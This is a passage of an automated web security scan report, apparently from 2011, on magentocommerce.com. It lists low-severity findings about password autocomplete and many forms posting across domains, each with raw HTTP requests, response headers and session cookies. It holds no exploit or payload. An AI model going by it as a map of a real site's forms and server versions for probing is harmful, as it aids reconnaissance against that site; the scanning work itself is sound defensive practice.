<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.152. http://www.magentocommerce.com/whitepaper/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /whitepaper/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /whitepaper/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fwhitepaper%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 34176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
6. Cross-domain POST  previous  next
There are 156 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

6.1. http://www.magentocommerce.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:40:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: guid=db13949594b1b3d2138f3212e370aacf; expires=Mon, 06-Aug-2012 13:40:32 GMT; path=/
Set-Cookie: exp_domain=magentocommerce.com; expires=Sat, 11-Aug-2012 23:48:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=997810832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:40:32 GMT
Content-Length: 35354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.2. http://www.magentocommerce.com/!!!--  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /!!!--

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /!!!-- HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176591; expires=Sat, 11-Aug-2012 15:16:31 GMT; path=/; domain=magentocommerce.com
Content-Length: 32486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.3. http://www.magentocommerce.com/answers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /answers/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176378; expires=Sat, 11-Aug-2012 15:12:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fanswers%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:12:58 GMT
Content-Length: 54246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.4. http://www.magentocommerce.com/blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.5. http://www.magentocommerce.com/blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</div>
           <form action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=828202', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
           <fieldset style="margin-bottom:15px; padding:10px; background:url(http://www.magentocommerce.com/images/uploads/bg_feedburner_email.gif) repeat-x 0 100% #dcebf6; border:1px solid #adcfde;">
...[SNIP]...
6.6. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.8. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.9. http://www.magentocommerce.com/boards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.10. http://www.magentocommerce.com/boards/viewforum/10252/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /boards/viewforum/10252/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176393; expires=Sat, 11-Aug-2012 15:13:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewforum%2F10252%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:16 GMT
Content-Length: 112502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.11. http://www.magentocommerce.com/boards/viewthread/1647/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewthread/1647/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /boards/viewthread/1647/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176416; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewthread%2F1647%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: exp_forum_topics=a%3A0%3A%7B%7D; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:37 GMT
Content-Length: 116291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.12. http://www.magentocommerce.com/bug-tracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /bug-tracking

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /bug-tracking HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176426; expires=Sat, 11-Aug-2012 15:13:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbug-tracking%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:46 GMT
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.13. http://www.magentocommerce.com/company/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175799; expires=Sat, 11-Aug-2012 15:03:19 GMT; path=/; domain=magentocommerce.com
